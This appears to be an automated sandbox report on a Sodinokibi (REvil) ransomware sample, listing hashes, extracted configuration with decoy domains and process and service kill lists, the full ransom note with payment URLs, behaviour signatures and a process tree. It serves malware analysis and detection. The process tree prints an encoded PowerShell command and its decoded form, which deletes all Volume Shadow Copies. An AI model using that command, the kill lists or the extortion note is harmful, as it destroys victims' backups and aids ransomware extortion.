Analysis

  • max time kernel
    126s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-03-2024 21:49

General

  • Target

    3a592e04fc7c4991dbc972a6e742814156d1a9505b7bc83fcef8c99f96c8b22c.exe

  • Size

    123KB

  • MD5

    8be4b3f41ef22c97f04eeb68d490dd5b

  • SHA1

    e94debf303e6b83194e45659a7cb8f26b7ad8519

  • SHA256

    3a592e04fc7c4991dbc972a6e742814156d1a9505b7bc83fcef8c99f96c8b22c

  • SHA512

    926102a46daf75c877f07870f0e0d298518f5699f453d525f946b8eaa9fed3934603cdd6e6f5e6e7c3be8825ebd3cf1a055f119bb7d862a3cfa7ff48cd436617

  • SSDEEP

    1536:7DvcP30ThpshwVs5OE8yNcYQp+2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOxN:yrSVhaNcYM8gnBR5uiV1UvQFOxN

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr

Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice

    dbsnmp

    mydesktopservice

    outlook

    ocomm

    excel

    mydesktopqos

    isqlplussvc

    onenote

    tbirdconfig

    msaccess

    encsvc

    infopath

    steam

    thebat

    agntsvc

    sql

    visio

    wordpad

    winword

    dbeng50

    powerpnt

    firefox

    xfssvccon

    mspub

    oracle

    thunderbird

    ocssd

    synctime

    ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. 
From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4085

  • svc

    memtas

    mepocs

    backup

    sophos

    sql

    svc$

    veeam

    vss

Extracted

Path

C:\Users\0q611h83c-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 0q611h83c. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/471229BDD599EAFA 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/471229BDD599EAFA Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: cvLnwyNY//vjk57Oo7g2qvG3tecAKxuusvVbyalQYkKK5Val2fuPbsenykJivcP9 a6wyI7xQDaePhkKIDwxC4hfyORXH07BT4Bi52hhmHUw2JrZRuu/W2XgfxX/NFVIP gc0jZBqC3na34s6eX7138+GfW7hsylOzPG6Uj3wGzFv09L1x0pVA0Ll1GUXE1Flj wiR4MwaBtjiktBw2vShxCXrBtguCAWTtDftdK5pKdZulPQR6hEWrp7/B6WWDtyv/ 0c72+CVglIXBTygQubD4M50Ubx9ZxLcZmW7nSlKOR2p7cjNuUQqWRapxljU6OQTb zVk/yMKM3v20PqzRRdN8M8xOm3InfUP0dp8H2tGE2KktIyE+lMneiDZLtUFUBWBx BMWPnJqxf95jwS6q9dmvyiH6BZu1UCBg5Q1WaFzhGDLLP95fIbv89ajuhsqbKPh0 GDhcnnIMcH3eZ5P2ZZxziOttp+ysNGQ79RLQag7EUcHHbgjW+CyxdBoM+lcHyFld 4RiuqulXf/vySGKXKiN8pP16z0yep07GHCLg2fkkPvx4UP2C554HxHLpQ1IUKsMq xW7jqOGWKjbSWvCounFJ+LAe78f4ZH4liLsppWgm8GlUZdvopaZtPQjgYArim2Ev ZMR5w7B85erHnk9q0DiH1icuzQPi6euZGyNfa6u3v8RUhQKJy6Oxcfx/zX/2tqLR UwQkSH1svBKFfkMQ7FEggAmrlIak/ytX6KVQYAb3dBYGZnFlNnndIJgRxpOxvUGl iZlZZJJXGvJhKmfOqprVelVPD/CBD2UA8pkYxx5uU1h3XCcnw18Hfi2I9d2Nx5Ic M/zH+mrSntP2sP59AVEvRwoqY4EBhiGXaM+ZnzR8vKevMJjiuWhtsTOaVbzRL62I oUJcoW5VTySZpM8FwWafqO91WxK6XlanP7jNqYjTkV4YC0ThJhzL9zFmrJa+UdaZ u1vtpEMecKDY06f1yimpd6lTyfE3hGa/QLqfc101ZIF5re8svgbuwmze4HxAo1QF KNTYpnzjuErqMpQsK9NLEtanxCMTlu+jrhcAbIp6qg2hjb6eMgsK1QIFgKagmeMS Gbzn/SlrdS+qc0gLUgSvnUOqtDS2XbwBEqmxBzi1nQmiLhZlB+POVhYrVuJ8xGg7 YaQXwh89OvbUw4l2/0Lxa8wyQSTIIxT3X7FrJPLhkqGtwqcE5mPvWALaso1dXJHR gBAlcKeml85R7/4Onbe4Ulq2m8HiY8cl5HmdWQndym+ZkTYq5oxW0ZYi8EsyDb6g V8p36+iXreuAfEbdWQivYkwIfKPGB/RzSGXzBUM6w+RKiMPBQ0Q1m5xh4WR5C2fq N9NrFrY6cdmf74fiAxhrosJD75oIuljLU5waB+Alez8wLLg7F+w= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/471229BDD599EAFA

http://decryptor.cc/471229BDD599EAFA

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 22 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3a592e04fc7c4991dbc972a6e742814156d1a9505b7bc83fcef8c99f96c8b22c.exe
    "C:\Users\Admin\AppData\Local\Temp\3a592e04fc7c4991dbc972a6e742814156d1a9505b7bc83fcef8c99f96c8b22c.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} — i.e. deletion of all Volume Shadow Copies, which is why vssvc.exe appears in the process tree)
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2132
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2632
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2804

Network

MITRE ATT&CK Enterprise v15


Downloads

    • C:\Users\0q611h83c-readme.txt

      Filesize

      6KB

      MD5

      b54687ef9e19f431decd98e339444928

      SHA1

      5315a0e634bff8af5fd9d403c21ee423fed022e2

      SHA256

      1dc55b9db6c08cf8ac7e2e72144d1db49e3ebe63b5852a1bb91db79ad8054dfb

      SHA512

      9fe45fb44e4f73e8eac165773f17ef3f84dec7f912f5976c5c0034af843bbb8b672050c80d27f4b13ee493a0a5537d005385ab74e1a4dd43ff88e83608d5e2fb

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

    • C:\Users\Admin\AppData\Local\Temp\CabA1EC.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\TarA79E.tmp

      Filesize

      132KB

      MD5

      443b694fb09f9513f53726dd51f257d4

      SHA1

      788aaff13e2595adaa1052b1512ad00da480e88a

      SHA256

      7565512ebecd6ec0b942d6f72903e8fdecaeb3056e4a6cd777d8241e74209937

      SHA512

      0db2a56119a3e04ae628ea24c4229b62a5529fe6a35cc7e77f39420fee774c01290fe7ccf35fa030aaa29da52ee3c21402241ad5d5a87fbd22dad1d2456d21b7

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      192KB

      MD5

      89498979134599a071b38cd1e93085f8

      SHA1

      8f5aff2c308a4298aba328f83280dbd87e86c578

      SHA256

      87a3ac9280ee92196fcb5ffdbe67101f15def216b33973af07dbe84cbda49d6c

      SHA512

      0f4a827875d4111f6ca0bc683d22d9429882073c5827eeddfbde9485fe4a99b7a25cdd8147a4d1f9e2595801641c9b2a47c12319a0345e035f8924bad21030e7

    • memory/2132-9-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

    • memory/2132-16-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

    • memory/2132-11-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

    • memory/2132-5-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

      Filesize

      2.9MB

    • memory/2132-13-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

      Filesize

      9.6MB

    • memory/2132-14-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

    • memory/2132-15-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

    • memory/2132-10-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

      Filesize

      9.6MB

    • memory/2132-17-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

    • memory/2132-18-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

      Filesize

      9.6MB

    • memory/2132-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

      Filesize

      32KB

    • memory/2132-8-0x0000000002860000-0x00000000028E0000-memory.dmp

      Filesize

      512KB

    • memory/2132-7-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

      Filesize

      9.6MB

    • memory/2184-0-0x00000000003D0000-0x00000000003F2000-memory.dmp

      Filesize

      136KB

    • memory/2184-12-0x00000000003D0000-0x00000000003F2000-memory.dmp

      Filesize

      136KB